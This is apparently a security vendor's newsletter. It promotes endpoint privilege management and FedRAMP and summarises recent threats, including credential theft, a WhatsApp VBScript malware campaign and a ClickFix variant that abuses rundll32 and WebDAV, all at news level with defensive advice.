"We’re in a fortunate—or unfortunate—position in that we get to hear the stories of lots of customers who have come to us after they got hit. We get to see details of those attacks, and in many cases, we get to understand them. We’re taking all of that data, and we build around it." - Danny Jenkins
Danny Jenkins joins Adam Savage's Tested
Why Adam Savage won't trust USB keys
This week, Danny joined Adam Savage's Tested to discuss the dangers of USB keys. You never know what could be on those drives, and you could initiate a malicious program just by plugging it in.
And how endpoint privilege management shuts them down
What's happening: Many organizations still rely on broad admin privileges to keep operations moving, but that convenience comes at a cost. Endpoint privilege management (EPM) controls and monitors user privileges to reduce security risk while ensuring users always have access to what they need. Instead of blanket admin access, EPM offers granular, just-in-time privileges and clear logging for analysis and record keeping.
Why it matters:Overprivileged accounts are one of the easiest ways for attackers to escalate access and move laterally. A minor compromise can quickly become a major breach. EPM also helps satisfy many industry regulatory requirements without expanding your attack surface.
The big picture: Least privilege is no longer optional. A strong EPM solution should include automation capabilities to lighten the load on IT teams, scalability, and clear visibility into access and policy decisions. ➡️Read more about how to choose the right EPM solution.
What you need to know: Security expectations are increasing for all organizations, particularly federal agencies, their contractors, MSPs, and technology providers. FedRAMP status indicates long-term viability for organizations operating in regulated environments. Organizations on the FedRAMP Marketplace have passed one of the most demanding audit and validation programs in the world, meaning the platform is built to meet sustained, enforceable security expectations.
Why it matters: Organizations aren't just being asked if they're compliant. They're being asked if they can enforce security continuously, produce audit-ready evidence at any time, and if they can scale into regulated environments. FedRAMP helps answer those questions early.
The big picture: FedRAMP is about more than compliance. FedRAMP security is stronger by design, helps you align quickly with common security frameworks like CMMC and NIST, and prevents future rework when it comes to audits and regulatory exposure. ➡️Learn more about FedRAMP.
What's happening: Cybercriminals are doubling down on credential theft because it works. According to Verizon's 2025 DBIR, 22% of breaches assessed used compromised credentials as the initial access vector. Attackers are using phishing, social engineering, infostealers, and purchased credentials to gain access without triggering alarms.
Why it matters: When attackers log in with valid credentials, lateral movement, data exfiltration, and privilege escalation are all easier. AI is making phishing and social engineering more believable, meaning organizations must assume credentials will be compromised and plan to stop attackers if they get inside.
The big picture: Even simple security controls go a long way in protecting your organization. Organizations should continuously review access logs to better identify unusual activity like logins from unusual locations, spikes in failed login attempts, and unexpected after-hours access. ➡️Get more tips for protecting your organization from credential theft.
Join us to learn how AI-boosted attacks work, what they're targeting, and how you can fight back to protect your organization.
Attackers are following their targets across platforms
What's happening: Microsoft is warning of new campaigns using WhatsApp to deliver malware directly to targets. Beginning in February, attackers are using the app to distribute Visual Basic Script files to initiate a multi-stage infection chain to enable remote access. After gaining access, attackers escalate privileges and ultimately install malicious MSI packages.
Why it matters: WhatsApp is widely used and trusted, making it a prime vector for attackers. The activity blends into normal system activity and uses legitimate tools and platforms to lower skepticism.
The big picture: In a Zero Trust architecture, you never let your guard down. Phishing attacks are increasing and becoming more believable, but don't let that distract you from other potential access vectors. Attackers will follow users across platforms. Defense should as well.
ClickFix evolves to bypass PowerShell detection
Blending malicious commands into legitimate behavior
What's happening: CyberProof researchers identified a new variant of ClickFix attacks that tricks victims into infecting their own devices. By combining Windows Run dialog, rundll32.exe, and WebDAV, attackers are able to bypass defenses that are monitoring for script-based activity. It begins with luring users to a compromised site where the user is then prompted to open Windows Run and paste a copied command. Eventually, the infection chain transitions to PowerShell using non-interactive flags to download and run additional payloads without raising alarm.
Why it matters: Many defenses are designed to catch suspicious command execution. This campaign deliberately avoids using recognizable function names to avoid such detection. To further hide from sandbox environments and analysts, it finds Windows APIs on the fly using the DJB2 hashing method.
The big picture: Detecting unusual behavior is key to preventing new variants such as this one. Restricting unnecessary WebDAV traffic and monitoring for unusual executions can stop an attack like this early.
The next issue of Cyber Hero Frontline features insights into:
